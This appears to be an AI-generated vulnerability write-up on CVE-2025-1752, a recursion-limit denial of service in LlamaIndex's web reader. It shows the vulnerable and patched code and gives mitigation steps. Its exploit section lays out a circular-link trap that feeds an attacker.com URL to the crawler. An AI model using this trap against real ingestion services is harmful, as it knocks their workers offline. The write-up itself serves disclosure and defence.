CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Dashboard
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2025-1752
7.50.06%

The Infinite Loop of Death: Crashing LlamaIndex with Simple Recursion

Alon Barad
Alon Barad
Software Engineer

Feb 21, 2026·5 min read·4 visits

PoC Available

Executive Summary (TL;DR)

The `KnowledgeBaseWebReader` in LlamaIndex failed to increment or check recursion depth during web crawls. An attacker can supply a URL pointing to a page with circular links, causing the Python process to hit its recursion limit and crash (DoS). Fixed in `llama-index-readers-web` version 0.3.6.

In the race to feed Large Language Models (LLMs) with data, developers often overlook the basics of web crawling safety. CVE-2025-1752 is a stark reminder of this: a High-severity Denial of Service vulnerability in LlamaIndex's web reader component. By failing to track recursion depth during a crawl, the library allows attackers to trap the ingestion process in an infinite loop, leading to a stack exhaustion crash (`RecursionError`). This affects any application using `KnowledgeBaseWebReader` to ingest content from untrusted URLs.

The Hook: Feeding the Beast

We live in the age of RAG (Retrieval-Augmented Generation). Everyone and their dog is building pipelines to scrape the internet, chunk the text, embed it, and shove it into a vector database so their AI chatbot knows about the latest company policy or news article. LlamaIndex is one of the premier frameworks for this orchestration. It's the shovel we use to feed the beast.

But here's the thing about shovels: if you aren't careful, you can whack yourself in the face. Specifically, the KnowledgeBaseWebReader component—designed to crawl knowledge bases and documentation sites—had a fatal flaw in how it walked the web. It assumed that web pages are trees. They aren't. The web is a graph, and graphs have cycles.

This vulnerability isn't complex memory corruption. It's not a buffer overflow in C. It's a logic error in Python that turns a simple URL ingestion task into a process-killing weapon. If you are allowing users to submit URLs for your AI to 'learn' from, you just handed them a kill switch for your worker nodes.

The Flaw: The Placebo Parameter

The vulnerability (CWE-674: Uncontrolled Recursion) lies in the get_article_urls method. The developers intended to limit the crawl depth—they even included a parameter named max_depth in the function signature. It looks safe on paper. You see max_depth=100 and think, 'Ah, good, it won't crawl the entire internet.'

But here is the punchline: they never actually checked or incremented a depth counter. They passed the static max_depth value down to every child call, but never passed the current depth.

Imagine telling a runner, 'Stop running after 10 miles,' but never giving them a watch or mile markers. They just keep running until they collapse. In computer science terms, this is the difference between a while loop with a broken condition and a recursive function without a base case. The Python interpreter, thankfully, has a fail-safe: sys.getrecursionlimit() (usually 1000). When the code hits that wall, it doesn't just stop gracefully; it raises a RecursionError and crashes the program.

The Code: The Smoking Gun

Let's look at the code. It is almost comical how close they were to getting it right, yet how completely they missed it.

The Vulnerable Code (Simplified):

def get_article_urls(self, browser, root_url, current_url, max_depth=100):
    # ... scraping logic ...
    for link in links:
        # CRITICAL FAIL: max_depth is passed, but no 'current_depth' is tracked.
        # The function has no idea how deep it is.
        article_urls.extend(
            self.get_article_urls(browser, root_url, link, max_depth)
        )

Do you see it? max_depth is a constant. If I call this with max_depth=10, the child calls it with max_depth=10. The grandchild calls it with max_depth=10. There is no depth counter increasing (0, 1, 2...).

The Fix (Commit 3c65db2):

# Now we track 'depth' and increment it.
def get_article_urls(self, browser, root_url, current_url, max_depth=100, depth=0):
    # The Base Case! Finally!
    if depth >= max_depth:
        return []
 
    # ... scraping logic ...
    for link in links:
        article_urls.extend(
            # Increment depth!
            self.get_article_urls(browser, root_url, link, max_depth, depth + 1)
        )

The fix is standard CS 101: add a depth argument, default it to 0, check if depth >= max_depth, and recurse with depth + 1.

The Exploit: Building the Ouroboros

To exploit this, we don't need advanced fuzzing or heap spraying. We just need two HTML files. Let's create a deadly trap for the KnowledgeBaseWebReader.

Step 1: The Trap

We set up a simple Flask server hosting two pages: /alpha and /omega.

  • /alpha contains a link to /omega.
  • /omega contains a link to /alpha.

Step 2: The Trigger

We feed http://attacker.com/alpha to the LlamaIndex reader.

The Execution Flow:

  1. get_article_urls(..., url='/alpha') runs.
  2. Finds link to /omega. Calls get_article_urls(..., url='/omega').
  3. Finds link to /alpha. Calls get_article_urls(..., url='/alpha').
  4. Finds link to /omega...

Since the vulnerable code has no visited list (a set of URLs already processed) AND no depth limit enforcement, this ping-pong continues instantly until the Python stack explodes.

This crashes the thread. If you are running this in a Celery worker or a synchronous API handler, that worker is dead. If you don't have robust supervisor processes, your service starts dropping requests.

The Mitigation: Stopping the Bleeding

The immediate fix is to upgrade llama-index-readers-web to version 0.3.6 or later. This introduces the depth tracking logic seen in the code section above.

> [!NOTE] > Researcher's Note: Even with the patch, the crawler doesn't seem to implement a visited set (deduplication) based on the diff analysis. While the depth parameter prevents infinite recursion crashes, a site with a massive number of links within the max_depth range could still cause performance degradation (a 'wide' traversal DoS rather than a 'deep' one). However, the crash vector is resolved.

Defensive Strategy:

  1. Upgrade: pip install --upgrade llama-index-readers-web
  2. Sanitize Inputs: Never trust user-provided URLs. Implement a blocklist for private IP ranges (prevent SSRF while you're at it) and consider checking the Content-Length or structure of the target page before fully committing resources.
  3. Timeouts: Wrap your ingestion logic in a strict timeout. If a crawl takes longer than 60 seconds, kill it. Python's func_timeout or Celery's time limits are your friends here.

Official Patches

LlamaIndexRelease notes containing the fix

Fix Analysis (1)

Technical Appendix

CVSS Score
7.5/ 10
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Probability
0.06%
Top 82% most exploited

Affected Systems

LlamaIndex (Python Framework)llama-index-readers-webRAG Pipelines using Web Scraping

Affected Versions Detail

Product
Affected Versions
Fixed Version
llama-index-readers-web
LlamaIndex
< 0.3.60.3.6
AttributeDetail
CWE IDCWE-674 (Uncontrolled Recursion)
CVSS v3.07.5 (High)
Attack VectorNetwork
ImpactDenial of Service (DoS)
Exploit StatusPOC Available
Patch Date2025-02-27

MITRE ATT&CK Mapping

T1499Endpoint Denial of Service
Impact
CWE-674
Uncontrolled Recursion

The product does not properly control the amount of recursion that takes place, consuming excessive resources, such as memory or the program stack.

Known Exploits & Detection

GitHubProof of Concept demonstrating circular link crash

Vulnerability Timeline

Vulnerability patched in source code
2025-02-27
CVE-2025-1752 Published
2025-05-10
CVSS Score Updated
2025-10-15

References & Sources

  • [1]NVD Entry for CVE-2025-1752
  • [2]Huntr Security Advisory

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.